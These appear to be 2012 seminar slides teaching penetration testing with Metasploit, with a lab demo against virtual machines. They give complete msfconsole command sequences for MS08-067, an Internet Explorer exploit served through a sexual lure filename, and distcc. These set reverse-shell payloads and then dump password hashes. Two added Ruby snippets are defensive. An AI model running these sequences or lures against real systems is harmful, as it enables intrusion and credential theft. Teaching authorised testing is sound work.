Penetration Testing with Metasploit
Presented by Syarif (3xu5)
Seminar IT Security "Safe The System" Sumedang, April 29 2012, STMIK Sumedang
Sunday, April 29, 12
Agenda
* Why & what is penetration testing (pentest)
* << back|track overview
* Metasploit basics & Meterpreter
* DEMO :)
Why Do a Pentest
Millions of dollars are invested in security programs to protect critical infrastructure and prevent data breaches. *1)
A penetration test is one of the most effective ways to identify systemic weaknesses and deficiencies in these programs. *1)
What is Penetration Testing
* A method to evaluate the security of a computer system / network
* Practice attacking an IT system the way a hacker does
* Find security holes (systemic weaknesses), bypass security mechanisms, compromise an organization's IT system security
* You must have permission from the IT system owner!
* Illegal activity puts you in jail
Ethics
* Think before you act
* Don't be stupid
* Don't be malicious
Pentest Phases
1. Information Gathering
2. Vulnerability Analysis
3. Exploitation
4. Post Exploitation
5. Reporting
<< back|track overview
Let's watch the video :)
<< back|track overview
* The most advanced Linux security distribution
* Real-world pentesting tools
* Developed for security professionals
* Open source, and always will be
What is Metasploit
* Not just a tool, but an entire framework *1)
* An open-source platform for writing security tools and exploits *2)
* Easily build attack vectors by adding its exploits, payloads and encoders
* Create and execute more advanced attacks
* Ruby based
Metasploit Interfaces
* MSFconsole
* MSFcli
* msfweb, msfgui (discontinued)
* Metasploit Pro, Metasploit Express
* Armitage
MSFconsole
MSFcli
Metasploit Terminology
* Exploit: code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
* Payload: code that we want the target system to execute (a few commands to be executed on the target system) *1)
* Shellcode: a set of instructions used as the payload when exploitation occurs *1)
* Module: a piece of software that can be used by Metasploit *1)
* Listener: a component that waits for an incoming connection *1)
How does exploitation work?
(Diagram: the attacker sends exploit + payload to the vulnerable server; (1) the exploit runs, then (2) the payload runs; the resulting session is used to upload / download data.)
Traditional Pentest vs Metasploit
Traditional pentest:
* Gather a public exploit
* Change offsets
* Replace the shellcode
Metasploit for pentest:
* Load Metasploit
* Choose the target OS
* Use the exploit
* Set the payload
* Execute
Meterpreter
* Used as a payload after a vulnerability is exploited *1)
* Improves post exploitation
Meterpreter
Exploiting a vulnerability -> meterpreter shell: select meterpreter as the payload.
Meterpreter command
Pentest Scenario
(Diagram: the attacker and the vulnerable OSes run as virtual machines on VMware; among the targets is Ubuntu 8.04 Metasploitable.)
OS in the Lab
* BackTrack 5 R2 (attacker) - IP address: 172.16.240.143
* Windows XP SP2 - IP address: 172.16.240.129
* Windows 2003 Server - IP address: 172.16.240.141
* Windows 7 - IP address: 172.16.240.142
* Ubuntu Linux 8.04 (Metasploitable) - IP address: 172.16.240.144
Windows XP Exploitation
msf > search windows/smb
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l
Windows XP Post Exploitation
msf exploit(ms08_067_netapi) > sessions -i 1
meterpreter > getsystem -h
meterpreter > getuid
meterpreter > hashdump
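Reading hashdump output from the defender's side, as an added example that is not part of the slides: each line is user:RID:LM hash:NT hash:::, and the parser below (parse_hashdump, weak_accounts, the FAKE_* values and the sample dump are all constructed for this example) flags what a post-exploitation report should call out, such as a stored LM hash on XP SP2 or an empty password.

```ruby
# Added example, not from the slides: parse the user:RID:LM:NT::: lines that
# Meterpreter's hashdump prints (after getsystem) and flag the findings a
# post-exploitation report should raise.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

Entry = Struct.new(:user, :rid, :lm, :nt, :findings)

def parse_hashdump(text)
  text.each_line.each_with_object([]) do |line, entries|
    user, rid, lm, nt = line.strip.split(":", -1)
    # Skip banners and anything that is not a pair of 32-hex-digit hashes.
    next unless lm && nt && lm =~ /\A\h{32}\z/ && nt =~ /\A\h{32}\z/
    lm = lm.downcase
    nt = nt.downcase
    findings = []
    findings << "LM hash stored (legacy, easily cracked)" unless lm == EMPTY_LM
    findings << "empty password" if nt == EMPTY_NT
    findings << "built-in Administrator (RID 500)" if rid == "500"
    entries << Entry.new(user, rid.to_i, lm, nt, findings)
  end
end

# Accounts with at least one finding, in dump order.
def weak_accounts(entries)
  entries.select { |e| e.findings.any? }
end

# Constructed sample dump shaped like the XP SP2 demo. The two FAKE_* values
# are arbitrary hex strings, not hashes taken from any real system.
FAKE_LM = "0123456789abcdef0123456789abcdef"
FAKE_NT = "fedcba9876543210fedcba9876543210"
SAMPLE_DUMP = <<~DUMP
  (banner lines like this one are ignored)
  Administrator:500:#{EMPTY_LM}:#{EMPTY_NT}:::
  Guest:501:#{EMPTY_LM}:#{EMPTY_NT}:::
  HelpAssistant:1000:#{FAKE_LM}:#{FAKE_NT}:::
  demo:1003:#{EMPTY_LM}:#{FAKE_NT}:::
DUMP

if __FILE__ == $0
  weak_accounts(parse_hashdump(SAMPLE_DUMP)).each do |e|
    puts "#{e.user} (RID #{e.rid}): #{e.findings.join('; ')}"
  end
end
```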
Windows 2003 Server Exploitation
msf > search windows/smb
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.141
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l
Windows 7 Exploitation
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > show options
msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set LPORT 443
msf exploit(ms11_003_ie_css_import) > exploit
Then wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation
msf exploit(ms11_003_ie_css_import) > sessions -l
msf exploit(ms11_003_ie_css_import) > sessions -i 1
meterpreter > sysinfo
meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set RHOST 172.16.240.144
msf exploit(distcc_exec) > set LHOST 172.16.240.143
msf exploit(distcc_exec) > exploit
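All of the demos (Windows XP, Windows 2003, Windows 7 and the distcc box) use a reverse payload (windows/meterpreter/reverse_tcp, cmd/unix/reverse), so the compromised host is the one that opens the TCP connection back to LHOST. As an added example that is not part of the slides, the detector below (parse_conn_log, peer_listeners, the key=value log format, the KNOWN_SERVERS allowlist and the sample records are all constructed for this example) reads connection logs and surfaces an internal host that is quietly acting as a server for its peers, which is what the BackTrack box at 172.16.240.143 looks like from the network side.

```ruby
# Added example, not from the slides: in every demo the victim connects back
# to LHOST, so on the wire the attacker's box is a workstation that accepts
# connections from other workstations. This detector looks for exactly that.
require 'ipaddr'
INTERNAL = IPAddr.new("172.16.240.0/24")      # lab subnet from the slides
# Internal hosts allowed to accept peer connections (assumed allowlist; here
# only a constructed gateway/DNS address, not anything from the slides).
KNOWN_SERVERS = ["172.16.240.1"].freeze

# Parse constructed "key=value ..." records into hashes; skip malformed lines.
def parse_conn_log(text)
  text.each_line.map do |line|
    f = line.scan(/(\w+)=(\S+)/).to_h
    next unless f["src"] && f["dst"] && f["dport"]
    { ts: f["ts"], src: f["src"], dst: f["dst"],
      dport: f["dport"].to_i, proto: f["proto"] }
  end.compact
end

# { listener_ip => { port => [distinct source ips] } } for internal hosts that
# are not known servers yet accept TCP connections from other internal hosts.
def peer_listeners(records)
  out = Hash.new { |h, k| h[k] = Hash.new { |h2, k2| h2[k2] = [] } }
  records.each do |r|
    next unless r[:proto] == "tcp"
    next unless INTERNAL.include?(r[:src]) && INTERNAL.include?(r[:dst])
    next if KNOWN_SERVERS.include?(r[:dst])
    sources = out[r[:dst]][r[:dport]]
    sources << r[:src] unless sources.include?(r[:src])
  end
  out
end

# Constructed records mirroring the lab: Metasploit's default LPORT 4444 for
# the XP, 2003 and distcc sessions; the Windows 7 lure fetch (80) plus LPORT 443.
SAMPLE_LOG = <<~LOG
  ts=2012-04-29T10:01:12 src=172.16.240.129 dst=172.16.240.1 dport=53 proto=udp
  ts=2012-04-29T10:03:40 src=172.16.240.129 dst=172.16.240.143 dport=4444 proto=tcp
  ts=2012-04-29T10:11:05 src=172.16.240.141 dst=172.16.240.143 dport=4444 proto=tcp
  ts=2012-04-29T10:20:51 src=172.16.240.142 dst=172.16.240.143 dport=80 proto=tcp
  ts=2012-04-29T10:20:53 src=172.16.240.142 dst=172.16.240.143 dport=443 proto=tcp
  ts=2012-04-29T10:30:00 src=172.16.240.144 dst=172.16.240.143 dport=4444 proto=tcp
LOG

if __FILE__ == $0
  peer_listeners(parse_conn_log(SAMPLE_LOG)).each do |ip, ports|
    ports.each { |port, srcs| puts "#{ip}:#{port} accepts peers: #{srcs.join(', ')}" }
  end
end
```

The same logic applied to a real network needs the allowlist filled with the hosts that legitimately serve peers (file, print, directory and proxy servers); everything else that shows up as a listener is worth a look.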
Any Questions?
Contact me
Website: http://3x.us
Official BackTrack Indonesia Community: http://indobacktrack.or.id
Email: 3xu5@indobacktrack.or.id
Twitter: @3xu5
Greets & Thanks To
* BackTrack Linux
* Metasploit Team (HD Moore & Rapid7)
* Offensive Security / Metasploit Unleashed
* David Kennedy
* Georgia Weidman
References
1. Metasploit: The Penetration Tester's Guide - David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni
2. http://www.metasploit.com
3. http://www.offensive-security.com/metasploitunleashed/Main_Page
4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines